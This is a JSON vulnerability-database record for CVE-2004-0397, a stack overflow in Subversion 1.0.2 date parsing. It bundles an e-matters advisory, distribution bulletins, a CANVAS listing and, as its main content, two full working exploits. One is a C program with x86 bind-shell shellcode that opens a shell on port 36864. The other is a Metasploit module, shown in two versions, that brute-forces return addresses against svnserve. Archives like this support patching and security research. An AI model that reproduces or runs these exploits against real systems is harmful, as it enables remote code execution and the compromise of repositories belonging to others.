"exploitdb": [{"lastseen": "2016-01-31T12:08:13", "description": "Subversion 1.0.2 svn_time_from_cstring() Remote Exploit. CVE-2004-0397. Remote exploit for linux platform", "published": "2004-06-25T00:00:00", "type": "exploitdb", "title": "Subversion 1.0.2 - svn_time_from_cstring Remote Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0397"], "modified": "2004-06-25T00:00:00", "id": "EDB-ID:304", "href": "https://www.exploit-db.com/exploits/304/", "sourceData": "/* subversion-1.0.2 exploit by Gyan Chawdhary ... \r\n* exploits a stack overflow in the svn_time_from_cstring() function. We build\r\n* a date format which is valid but at the same time exits after the sscanf \r\n* function, or else it branches into another function which segfaults at the\r\n* apr_pool_t *pool. We overwrite our eip with a pointer to the main *data \r\n* buffer stored in the heap where our shell code is stored in the main request\r\n* itself. This is cause the local stack space for svn_time_from_cstring is \r\n* small. Will bind a shell on 36864 port. Modify it for ur own usage. \r\n*\r\n* boring exploit for a boring vulnerability \r\n* Gyan\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n\r\n#define BUF_SIZE ( 1024 * 2 )\r\n#define TRUE 1\r\n#define FALSE 0\r\n#define PORT 3690 /* Default svnserve Port */\r\n#define IP \"127.0.0.1\"\r\n#define CMD \"/bin/uname -a ; id ;\\r\\n\";\r\n\r\nstruct targets {\r\nchar *os;\r\nunsigned int *eip;\r\nunsigned int *shell_nop;\r\n};\r\n\r\n/*struct targets TARGETS[] =\r\n{\r\n{ \"Redhat 8.0 - (Psyche)\", \r\n*/ \r\nchar offset1[] = \"\\x78\\x32\\x06\\x08\"; // 0x8063278 + 88 + 12;\r\nchar offset2[] = \"\\xdc\\x32\\x06\\x08\"; // 0x80632dc\r\n\r\nint sockfd;\r\n\r\nchar request1[] = \"( 2 ( edit-pipeline ) %d:%s )\\n\";\r\n\r\nchar request2[] = \"( ANONYMOUS ( 0: ) )\\n\";\r\n\r\nchar request3[] = \"( get-dated-rev ( 314:aaaaaaaa%saaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%saaaaaaaa%saaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 4 a tttt 16:24:23.111 (day 277, dst 1, gmt_off -18000) ) )\\n\";\r\n\r\nchar request4[] = \"( check-path ( 0: ( 0 ) ) )\\n\";\r\n\r\n\r\n/* p_types */\r\nvoid xp_connect(char *);\r\nchar *build_request(char *);\r\nvoid talk(char *, char *);\r\n\r\n\r\nchar shellcode[] = \r\n\"\\xeb\\x72\\x5e\\x29\\xc0\\x89\\x46\\x10\\x40\\x89\\xc3\\x89\\x46\\x0c\"\r\n\"\\x40\\x89\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\x43\\xc6\\x46\"\r\n\"\\x10\\x10\\x66\\x89\\x5e\\x14\\x88\\x46\\x08\\x29\\xc0\\x89\\xc2\\x89\"\r\n\"\\x46\\x18\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\\x14\\x89\\x4e\\x0c\"\r\n\"\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\\xb0\\x66\"\r\n\"\\xcd\\x80\\x89\\x56\\x0c\\x89\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\"\r\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\\x3f\\x41\\xcd\\x80\\xb0\\x3f\"\r\n\"\\x41\\xcd\\x80\\x88\\x56\\x07\\x89\\x76\\x0c\\x87\\xf3\\x8d\\x4b\\x0c\"\r\n\"\\xb0\\x0b\\xcd\\x80\\xe8\\x89\\xff\\xff\\xff/bin/sh\";\r\n\r\n\r\nvoid xp_connect(char *ip)\r\n{\r\n// int sockfd;\r\nstruct sockaddr_in s;\r\nchar buffer[1024];\r\nchar temp[1024];\r\nint tmp;\r\n\r\ns.sin_family = AF_INET;\r\ns.sin_port = htons(PORT);\r\ns.sin_addr.s_addr = inet_addr(IP);\r\n\r\nif ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n{\r\nprintf(\"Cannot create socket\\n\");\r\nexit(-1);\r\n}\r\n\r\nif((connect(sockfd,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 0)\r\n{\r\nprintf(\"Cannot connect()\\n\");\r\nexit(-1);\r\n}\r\nmemset(temp, '\\0', sizeof(temp));\r\ntmp = recv(sockfd,temp,1024,0);\r\n\r\n}\r\n\r\nvoid talk(char *ip, char *repo)\r\n{\r\nchar buffer[1024], request[1024], tmp[512];\r\nstatic char string[] = \"svn://%s/%s\";\r\nint size;\r\nchar *str;\r\n\r\nsprintf(buffer, string, ip, repo);\r\nsize = strlen(buffer);\r\nsprintf(request, request1, size, buffer);\r\n\r\nxp_connect(ip);\r\n\r\nif (send(sockfd, request, strlen(request), 0) < 0)\r\n{\r\nprintf(\"send() failed\\n\");\r\nexit(-1);\r\n}\r\nrecv(sockfd, tmp, 512, 0);\r\n\r\nif (send(sockfd, request2, strlen(request2), 0) < 0)\r\n{\r\nprintf(\"send() failed\\n\");\r\nexit(-1);\r\n}\r\nrecv(sockfd, tmp, 512, 0);\r\n\r\nstr = build_request(shellcode);\r\n\r\nif(write (sockfd, str, strlen(str)) < 0)\r\n{\r\nprintf(\"write() failed\\n\");\r\nexit(-1);\r\n}\r\n\r\nclose(sockfd);\r\n//connect_target();\r\n}\r\n\r\n\r\n\r\nchar *build_request(char *sc)\r\n{\r\nchar *buffer, *ptr;\r\nbuffer = (char *)malloc(1024);\r\nptr = buffer;\r\nsprintf(ptr, request3, offset1, offset2, sc);\r\n\r\nreturn buffer;\r\n}\r\n\r\n\r\n\r\nmain(int argc, char **argv)\r\n{\r\ntalk(IP, \"cool\");\r\n}\r\n\r\n// milw0rm.com [2004-06-25]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/304/"}, {"lastseen": "2016-02-01T11:34:02", "description": "Subversion 1.0.2 Date Overflow. CVE-2004-0397. Remote exploits for multiple platform", "published": "2004-05-19T00:00:00", "type": "exploitdb", "title": "Subversion 1.0.2 - Date Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0397"], "modified": "2004-05-19T00:00:00", "id": "EDB-ID:9935", "href": "https://www.exploit-db.com/exploits/9935/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/exploit/http'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Brute\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Subversion Date Svnserve',\r\n\t\t\t'Description' => %q{\r\n This is an exploit for the Subversion date parsing overflow. This\r\n exploit is for the svnserve daemon (svn:// protocol) and will not work\r\n for Subversion over webdav (http[s]://). This exploit should never\r\n crash the daemon, and should be safe to do multi-hits.\r\n\r\n **WARNING** This exploit seems to (not very often, I've only seen\r\n it during testing) corrupt the subversion database, so be careful!\r\n\t\t\t},\r\n\t\t\t'Author' => 'spoonm',\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t \t['CVE', '2004-0397'],\r\n\t\t\t\t\t['OSVDB', '6301'],\r\n\t\t\t\t\t['BID',\t'10386'],\r\n\t\t\t\t\t['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],\r\n\t\t\t\t\t['MIL', '68'],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 500,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\",\r\n\t\t\t\t\t'MinNops' => 16,\r\n\t\t\t\t},\t\r\n\t\t\t'SaveRegisters' => [ 'esp' ],\r\n\t\t\t'Arch' => 'x86',\r\n\t\t\t'Platform' => [ 'linux', 'bsd' ],\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t[ \r\n\t\t\t\t\t\t'Linux Bruteforce',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xbffffe13 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 0\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ \r\n\t\t\t\t\t\t'FreeBSD Bruteforce',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'bsd',\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xbfbffe13 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfbf0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 0\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'May 19 2004'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3690),\t\r\n\t\t\t\tOptString.new('URL', [ true, \"SVN URL (ie svn://host/repos)\", \"svn://host/svn/repos\" ])\r\n\t\t\t], self.class)\r\n\t\r\n\t\tregister_advanced_options(\r\n\t\t\t[\r\n\t\t\t\t# 62 on spoonm's, 88 on HD's\r\n\t\t\t\tOptInt.new('RetLength', [ false, \"Length of rets after payload\", 100 ]),\r\n\t\t\t\tOptBool.new('IgnoreErrors', [ false, \"Ignore errors\", false ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\tend\r\n\r\n\tdef brute_exploit(addresses)\r\n\t\tconnect\r\n\t\t\r\n\t\tprint_status(\"Trying #{\"%.8x\" % addresses['Ret']}...\")\r\n\r\n\t\tbuffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded\r\n\t\t\r\n\t\t[\r\n\t\t\t\"( 2 ( edit-pipeline ) \" + lengther(datastore['URL']) + \" ) \",\r\n\t\t\t\"( ANONYMOUS ( 0; ) )\",\r\n\t\t\t\"( get-dated-rev ( \" + lengther(buffer + \" 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)\") + \" ) ) \"\r\n\t\t].each_with_index { |buf, index|\r\n\t\t\ttrash = sock.get_once\r\n\r\n\t\t\tprint_line(\"Received: #{trash}\") if debugging?\r\n\t\t\t\r\n\t\t\tif (sock.put(buf) || 0) == 0 and index < 3\r\n\t\t\t\tprint_error(\"Error transmitting buffer.\")\r\n\t\t\t\traise ExploitError, \"Failed to transmit data\" if !datastore['IgnoreErrors']\r\n\t\t\tend\r\n\r\n\t\t\tif index == 3 and trash.length > 0\r\n\t\t\t\tprint_error(\"Received data when we shouldn't have\")\r\n\t\t\t\traise ExploitError, \"Received data when it wasn't expected\" if !datastore['IgnoreErrors']\r\n\t\t\tend\r\n\t\t}\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\n\tdef lengther(buf)\r\n\t\t\"#{buf.length}:\" + buf\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9935/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:09", "bulletinFamily": "software", "cvelist": ["CVE-2004-0397"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n e-matters GmbH\r\n www.e-matters.de\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n\r\n Advisory: Subversion remote vulnerability\r\n Release Date: 2004/05/19\r\nLast Modified: 2004/05/19\r\n Author: Stefan Esser [s.esser@e-matters.de]\r\n\r\n Application: Subversion <= 1.0.2\r\n Severity: A vulnerability within Subversion allows remote \r\n compromise of Subversion servers.\r\n Risk: Critical\r\nVendor Status: Vendor is releasing a bugfixed version.\r\n Reference: http://security.e-matters.de/advisories/082004.html\r\n\r\n\r\nOverview:\r\n\r\n Quote from: http://subversion.tigris.org\r\n \r\n "The goal of the Subversion project is to build a version control system \r\n that is a compelling replacement for CVS in the open source community. \r\n The software is released under an Apache/BSD-style open source license.\r\n \r\n Features of Subversion\r\n \r\n * Most current CVS features\r\n * Directories, renames, and file meta-data are versioned\r\n * Commits are truly atomic\r\n * Apache network server option, with WebDAV/DeltaV protocol\r\n * Standalone server option\r\n * Branching and tagging are cheap (constant time) operations\r\n * Natively client/server, layered library design\r\n * Client/server protocol sends diffs in both directions\r\n * Costs are proportional to change size, not data size\r\n * Efficient handling of binary files\r\n * Parseable output"\r\n \r\n Subversion versions up to 1.0.2 are vulnerable to a date parsing \r\n vulnerability which can be abused to allow remote code execution\r\n on Subversion servers and therefore could lead to a repository\r\n compromise.\r\n \r\n \r\nDetails:\r\n \r\n Similar to the libneon issue a manual scan for common programming errors\r\n revealed an unsafe call to sscanf() in one of Subversions date parsing\r\n functions.\r\n \r\n When Subversions tries to convert a string into an apr_time_t it falls\r\n back to the vulnerable sscanf() to decode old-styled date strings.\r\n This function is exposed to an external attacker through a DAV2 REPORT\r\n query or a get-dated-rev svn-protocol command.\r\n \r\n Both ways have been proven exploitable, but exploiting through the\r\n DAV2 protocol is somewhat harder because the date string has to be\r\n in utf-8 format. On the other hand exploiting through the svn-protocol\r\n is a trivial standard stackoverflow with the exception that whitespace\r\n and the '\0' character is forbidden.\r\n \r\n And as a sidenotice: Exploiting this stackoverflow is even possible\r\n when Propolice or similar protections are in place because a lot of\r\n fancy things can be done by overwriting the function parameters.\r\n \r\n\r\nProof of Concept:\r\n\r\n e-matters is not going to release an exploit for this vulnerability to\r\n the public.\r\n \r\n\r\nDisclosure Timeline:\r\n\r\n 02. May 2004 - Subversion developers and vendor-sec were notified \r\n by email\r\n 03. May 2004 - Subversion vendor started their own analysis of the issue\r\n and started compiling a list of big repositories to\r\n receive pre-notifications\r\n 11. May 2004 - Big subversion repositories (not already contacted\r\n through vendor-sec) got pre-notified \r\n 19. May 2004 - Coordinated Public Disclosure\r\n\r\n \r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the name CAN-2004-0397 to this issue.\r\n\r\n\r\nRecommendation:\r\n\r\n Exploiting this vulnerability on not heavily protected servers is trivial\r\n even for beginners, therefore it is strongly recommended to update\r\n immediately. Even Propolice users aren't safe because overwriting function\r\n arguments allows some fancy exploits.\r\n \r\n \r\nGPG-Key:\r\n\r\n http://security.e-matters.de/gpg_key.asc\r\n \r\n pub 1024D/3004C4BC 2004-05-17 e-matters GmbH - Securityteam \r\n Key fingerprint = 3FFB 7C86 7BE8 6981 D1DA A71A 6F7D 572D 3004 C4BC\r\n\r\n\r\nCopyright 2004 Stefan Esser. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\niD8DBQFAqV5Ib31XLTAExLwRAjb6AJ9r+ji0jpYK+idA5Gj3IDRsoLAcFwCgyr2m\r\nk5m7y6DFOS30aAfJs1p58v8=\r\n=Ct/a\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n-- \r\n\r\n--------------------------------------------------------------------------\r\n Stefan Esser s.esser@e-matters.de\r\n e-matters Security http://security.e-matters.de/\r\n\r\n GPG-Key gpg --keyserver pgp.mit.edu --recv-key 0xCF6CAE69 \r\n Key fingerprint B418 B290 ACC0 C8E5 8292 8B72 D6B0 7704 CF6C AE69\r\n--------------------------------------------------------------------------\r\n Did I help you? Consider a gift: http://wishlist.suspekt.org/\r\n--------------------------------------------------------------------------\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "modified": "2004-05-19T00:00:00", "published": "2004-05-19T00:00:00", "id": "SECURITYVULNS:DOC:6239", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6239", "title": "[Full-Disclosure] Advisory 08/2004: Subversion remote vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:06", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0397"], "description": "### Background\n\nSubversion is a version control system intended to eventually replace CVS. Like CVS, it has an optional client-server architecture (where the server can be an Apache server running mod_svn, or an ssh program as in CVS's :ext: method). In addition to supporting the features found in CVS, Subversion also provides support for moving and copying files and directories. \n\n### Description\n\nAll releases of Subversion prior to 1.0.3 have a vulnerability in the date-parsing code. This vulnerability may allow denial of service or arbitrary code execution as the Subversion user. Both the client and server are vulnerable, and write access is NOT required to the server's repository. \n\n### Impact\n\nAll servers and clients are vulnerable. Specifically, clients that allow other users to write to administrative files in a working copy may be exploited. Additionally all servers (whether they are httpd/DAV or svnserve) are vulnerable. Write access to the server is not required; public read-only Subversion servers are also exploitable. \n\n### Workaround\n\nThere is no known workaround at this time. All users are encouraged to upgrade to the latest available version. \n\n### Resolution\n\nAll Subversion users should upgrade to the latest stable version: \n \n \n # emerge sync\n \n # emerge -pv \">=dev-util/subversion-1.0.3\"\n # emerge \">=dev-util/subversion-1.0.3\"", "edition": 1, "modified": "2006-05-22T00:00:00", "published": "2004-05-20T00:00:00", "id": "GLSA-200405-14", "href": "https://security.gentoo.org/glsa/200405-14", "type": "gentoo", "title": "Buffer overflow in Subversion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0397"], "description": "**Name**| svndate \n---|--- \n**CVE**| CVE-2004-0397 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Subversion <= 1.0.2 utf-8 Apache2/WebDAV stack vs. heap exploit \n**Notes**| CVE Name: CVE-2004-0397 \nVENDOR: Collabnet \nOSVDB: http://osvdb.org/displayvuln.php?osvdb_id=6301 \nRepeatability: Multiple tries \nReferences: http://security.e-matters.de/advisories/082004.html \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0397 \nDate public: 2004/05/19 \n\n", "edition": 2, "modified": "2004-07-07T04:00:00", "published": "2004-07-07T04:00:00", "id": "SVNDATE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/svndate", "type": "canvas", "title": "Immunity Canvas: SVNDATE", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:16", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0397"], "description": "\nStefan Esser reports:\n\nSubversion versions up to 1.0.2 are vulnerable to a date\n\t parsing vulnerability which can be abused to allow remote\n\t code execution on Subversion servers and therefore could\n\t lead to a repository compromise.\n\nNOTE: This vulnerability is similar to the date\n\t parsing issue that affected neon. However, it is a different\n\t and distinct bug.\n", "edition": 4, "modified": "2004-05-19T00:00:00", "published": "2004-05-19T00:00:00", "id": "5D36EF32-A9CF-11D8-9C6D-0020ED76EF5A", "href": "https://vuxml.freebsd.org/freebsd/5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a.html", "title": "subversion date parsing vulnerability", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-08-18T01:02:35", "description": "This is an exploit for the Subversion date parsing overflow. This exploit is for the svnserve daemon (svn:// protocol) and will not work for Subversion over webdav (http[s]://). This exploit should never crash the daemon, and should be safe to do multi-hits. **WARNING** This exploit seems to (not very often, I've only seen it during testing) corrupt the subversion database, so be careful!\n", "published": "2007-01-05T06:36:26", "type": "metasploit", "title": "Subversion Date Svnserve", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0397"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/SVN/SVNSERVE_DATE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/http/client'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Brute\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Subversion Date Svnserve',\n 'Description' => %q{\n This is an exploit for the Subversion date parsing overflow. This\n exploit is for the svnserve daemon (svn:// protocol) and will not work\n for Subversion over webdav (http[s]://). This exploit should never\n crash the daemon, and should be safe to do multi-hits.\n\n **WARNING** This exploit seems to (not very often, I've only seen\n it during testing) corrupt the subversion database, so be careful!\n },\n 'Author' => 'spoonm',\n 'References' =>\n [\n ['CVE', '2004-0397'],\n ['OSVDB', '6301'],\n ['BID',\t'10386'],\n ['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html']\n ],\n 'Payload' =>\n {\n 'Space' => 500,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\",\n 'MinNops' => 16,\n },\n 'SaveRegisters' => [ 'esp' ],\n 'Arch' => 'x86',\n 'Platform' => %w{ bsd linux },\n 'Targets' =>\n [\n [\n 'Linux Bruteforce',\n {\n 'Platform' => 'linux',\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xbffffe13 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 0\n }\n },\n ],\n [\n 'FreeBSD Bruteforce',\n {\n 'Platform' => 'bsd',\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xbfbffe13 },\n 'Stop' => { 'Ret' => 0xbfbf0000 },\n 'Step' => 0\n }\n },\n ],\n\n ],\n 'DisclosureDate' => 'May 19 2004'))\n\n register_options(\n [\n Opt::RPORT(3690),\n OptString.new('URL', [ true, \"SVN URL (ie svn://host/repos)\", \"svn://host/svn/repos\" ])\n ])\n\n register_advanced_options(\n [\n # 62 on spoonm's, 88 on HD's\n OptInt.new('RetLength', [ false, \"Length of rets after payload\", 100 ]),\n OptBool.new('IgnoreErrors', [ false, \"Ignore errors\", false ])\n ])\n end\n\n def brute_exploit(addresses)\n connect\n\n print_status(\"Trying #{\"%.8x\" % addresses['Ret']}...\")\n\n buffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded\n\n [\n \"( 2 ( edit-pipeline ) \" + lengther(datastore['URL']) + \" ) \",\n \"( ANONYMOUS ( 0; ) )\",\n \"( get-dated-rev ( \" + lengther(buffer + \" 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)\") + \" ) ) \"\n ].each_with_index { |buf, index|\n trash = sock.get_once\n\n print_line(\"Received: #{trash}\") if debugging?\n\n if (sock.put(buf) || 0) == 0 and index < 3\n print_error(\"Error transmitting buffer.\")\n fail_with(Failure::Unknown, \"Failed to transmit data\") if !datastore['IgnoreErrors']\n end\n\n if index == 3 and trash.length > 0\n print_error(\"Received data when we shouldn't have\")\n fail_with(Failure::Unknown, \"Received data when it wasn't expected\") if !datastore['IgnoreErrors']\n end\n }\n\n handler\n disconnect\n end\n\n def lengther(buf)\n \"#{buf.length}:\" + buf\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/svn/svnserve_date.rb"}], "suse": [{"lastseen": "2016-09-04T11:40:16", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0397", "CVE-2004-0396", "CVE-2004-0398"], "description": "The Concurrent Versions System (CVS) offers tools which allow developers to share and maintain large software projects. Stefan Esser reported buffer overflow conditions within the cvs program. They allow remote attackers to execute arbitrary code as the user the cvs server runs as. Since there is no easy workaround we strongly recommend to update the cvs package.", "edition": 1, "modified": "2004-05-19T11:10:20", "published": "2004-05-19T11:10:20", "id": "SUSE-SA:2004:013", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-05/msg00008.html", "title": "remote command execution in cvs", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}